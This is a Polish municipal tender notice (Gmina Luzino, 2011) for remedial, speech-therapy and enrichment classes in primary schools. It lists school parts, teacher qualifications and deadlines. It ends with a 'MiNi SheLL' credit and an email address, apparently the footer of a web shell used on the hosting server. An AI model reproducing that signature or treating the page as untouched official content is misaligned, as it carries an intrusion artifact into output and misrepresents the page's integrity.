Część nr 89 Zajęcia  logopedyczne , prowadzone w Szkole Podstawowej w Sychowie -  30 godzin
Część nr 90 Zajęcia rozwijające szczególne zainteresowania uczniów /teatralne/, prowadzone w Szkole Podstawowej w Sychowie - 60 godzin,
Część nr 91 Zajęcia terapii pedagogicznej / korekcyjno-kompensacyjne/, prowadzone w Szkole Podstawowej w Sychowie - 60 godzin,
3.5.4. Szkoła Podstawowa w Wyszecinie
Część nr 92 Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji, prowadzone w Szkole Podstawowej w Wyszecinie - 60 godzin,
Część nr 93 Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji, prowadzone w Szkole Podstawowej w Wyszecinie - 60 godzin,
Część nr 94 Zajęcia  dla dzieci trudnościami w zdobywaniu umiejętności matematycznych, prowadzone w Szkole Podstawowej w Wyszecinie - 60 godzin,
Część nr 95 Gimnastyka korekcyjna dla dzieci z wadami postawy, prowadzona w Szkole Podstawowej w Wyszecinie - 60 godzin,
Część nr 96 Zajęcia  rozwijające zainteresowania matematyczno-przyrodnicze uczniów szczególnie uzdolnionych, prowadzone w Szkole Podstawowej w Wyszecinie - 60 godzin,
Część nr 97 Zajęcia  logopedyczne, prowadzone w Szkole Podstawowej w Wyszecinie - 60 godzin,
Część nr 98 Zajęcia  logopedyczne, prowadzone w Szkole Podstawowej w Wyszecinie - 60 godzin,
3.5.5. Szkoła Podstawowa w Barłominie
Część nr 99 Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji, prowadzone w Szkole Podstawowej w Barłominie - 60 godzin,
Część nr 100 Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji, prowadzone w Szkole Podstawowej w Barłominie - 60 godzin,
Część nr 101 Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji, prowadzone w Szkole Podstawowej w Barłominie - 60 godzin,
Część nr 102 Zajęcia  dla dzieci z  trudnościami w zdobywaniu umiejętności matematycznych, prowadzone w Szkole Podstawowej w Barłominie - 60 godzin,
Część nr 103 Zajęcia  muzyczno-ruchowe, prowadzone w Szkole Podstawowej w Barłominie - 60 godzin,
3.5.6. Zajęcia mogą odbywać się równolegle w tych samych godzinach. 
3.5.7. Zajęcia prowadzone będą na terenie szkoły w systemie lekcyjnym, gdzie przez jedną godzinę lekcyjną rozumie się 45 minut..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 103.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił w tym zakresie warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił w tym zakresie warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił w tym zakresie warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować dysponowanie osobami zdolnymi do wykonania zamówienia, tak odpowiednio dla:
A)	CZĘŚCI 1,2,3,4,5,6,7,8,9,10,11,12,75,76,77,91,92,93,99,100    - wymagane jest 
dysponowanie minimum 1 osobą, która posiada wykształcenie wyższe z przygotowaniem pedagogicznym oraz ukończone studia podyplomowe lub kurs kwalifikacyjny z zakresu terapii pedagogicznej, 
B)CZĘŚCI13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,62,63,64,65,66,67,78,79,80,94,
102    - wymagane jest dysponowanie minimum 1 osobą, która posiada wykształcenie wyższe min. licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej lub ukończone studia magisterskie na kierunku matematyka z przygotowaniem pedagogicznym,
C) CZĘŚCI 137,38,39,40,41,42,43,44,45,46,73,74,86,87,88,89,97,98- wymagane jest dysponowanie minimum 1 osobą, która posiada wykształcenie wyższe min.  licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej oraz ukończone studia podyplomowe lub kursy kwalifikacyjne w zakresie logopedii lub wykształcenie wyższe zawodowe w zakresie logopedii z przygotowaniem pedagogicznym bądź ukończone studia min. licencjackie na kierunku filologia polska z przygotowaniem pedagogicznym oraz ukończone studia podyplomowe lub kursy kwalifikacyjne w zakresie logopedii,
D) CZĘŚCI  29,30,31,32,33,34,35,36,68,69,81,82,83,84,95   - wymagane jest dysponowanie minimum 1 osobą, która posiada wykształcenie wyższe  min. licencjackie z przygotowaniem pedagogicznym zakresie wychowania fizycznego oraz ukończone studia min. Licencjackie, studia podyplomowe lub kursy kwalifikacyjne w zakresie gimnastyki korekcyjnej lub rehabilitacji , bądź wykształcenie wyższe min. licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej oraz ukończone studia podyplomowe lub kursy kwalifikacyjne w zakresie gimnastyki korekcyjnej,
E) CZĘŚCI 47,48,49,70,71,72,85,96    - wymagane jest dysponowanie minimum 1 osobą, która posiada wykształcenie wyższe min. licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej lub ukończone studia magisterskie na kierunku matematyka lub przyroda z przygotowaniem pedagogicznym , bądź studia podyplomowe lub kursy przyrody, 
F) CZĘŚCI 103     - wymagane jest dysponowanie minimum 1 osobą, która posiada wykształcenie wyższe min. licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania muzyki lub sztuki w szkole lub wykształcenie wyższe min. licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej ,
G) CZĘŚCI 90- wymagane jest dysponowanie minimum 1 osobą, która posiada wykształcenie wyższe min. licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej ,
H) CZĘŚCI 50,51,52- wymagane jest dysponowanie minimum 1 osobą, która posiada wykształcenie wyższe min. licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej ,
I) CZĘŚCI 53,54,55- wymagane jest dysponowanie minimum 1 osobą, która posiada wykształcenie wyższe min. licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej wraz z skwalifikacjami do nauczania języka angielskiego lub ukończone studia min. licencjackie na kierunku filologia angielska z przygotowaniem pedagogicznym.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił w tym zakresie warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo (oryginał lub uwierzytelniona notarialnie kopia) osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów.
5.2.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu, razem z ofertą, pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>16.4	Zamawiający dopuszcza możliwość zmiany umowy, w szczególności w zakresie: 
1)	Zmiany terminu końcowego, w przypadku zmiany harmonogramu realizacji zajęć, ze względu na zmianę siatki godzin zajęć podstawowych, bądź nieobecności osoby wykonującej powierzoną funkcję, pod warunkiem podpisania przez strony porozumienia w sprawie zmiany terminu.
2)	Zmiany wynagrodzenia - w przypadku zmiany wysokości podatku VAT, w stopniu i terminie odpowiadającym tym zmianom.
3)	Zmiana harmonogramu realizacji zajęć, 
4)	Zmiany osoby wykonującej powierzoną  funkcję mogą nastąpić jedynie w szczególnie uzasadnionych sytuacjach (np. choroba), pod warunkiem, że osoba (osoby) wskazana do prowadzenia zajęć, będzie posiadała przygotowanie co najmniej równe osobie dotychczas pełniącej tę funkcję oraz będzie spełniała wymogi określone w specyfikacji istotnych warunków zamówienia.
5)	Zamiany lub wprowadzenia nowych podwykonawców pod warunkiem uzyskania zgody  Zamawiającego, na zasadach określonych w Istotnych Warunkach Umowy. 
6)	Zmiany danych Wykonawcy np. zmiana siedziby, adresu, nazwy (bez zmiany samego Wykonawcy).
7)	Zmiany formy zabezpieczenia na wniosek Wykonawcy, zgodnie z Prawem zamówień publicznych, pod warunkiem zachowania ciągłości zabezpieczenia i bez zmniejszenia jego wartości.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.luzino.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Luzino
ul. 10 Marca 11
84-242 Luzino.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2011 godzina 10:00, miejsce: Urząd Gminy Luzino
Kancelaria
ul. Ofiar Stutthofu 11
84-242 Luzino.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu systemowego pn. Dobry start - wyrównanie szans edukacyjno-rozwojowych dzieci klas I-III szkół podstawowych Gminy Luzino współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Priorytetu IX Programu operacyjnego Kapitał Ludzki: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1, Poddziałanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com